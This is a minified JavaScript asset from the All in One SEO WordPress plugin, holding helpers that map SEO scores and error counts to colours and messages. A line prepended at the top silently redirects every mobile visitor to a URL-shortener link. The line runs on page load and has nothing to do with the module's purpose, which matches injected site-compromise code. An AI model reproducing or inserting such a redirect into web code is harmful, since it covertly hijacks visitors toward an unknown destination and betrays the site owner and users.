(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{T as s}from"./app-core.c8323d51.js";import{_ as o,a as e,c as a}from"./vendor-other.39e59221.js";const r="all-in-one-seo-pack",y=()=>{const t={weveGotWorkToDo:e(o("We've got some%1$swork to do!",r),"<br>"),needsImprovement:e(o("Needs%1$sImprovement!",r),"<br>"),veryGood:o("Very Good!",r),excellent:o("Excellent!",r),allGood:o("All Good!",r)};return{getErrorClass:n=>5<n?"red":0<n?"orange":"green",getErrorDisplay:n=>0<n?e(a("%1$s Error","%1$s Errors",n,r),n):t.allGood,getScoreClass:n=>79<n?"green":49<n?"orange":0<n?"red":"none",runAnalysis:n=>{new s().runAnalysis(n)},strings:t}};export{y as u};
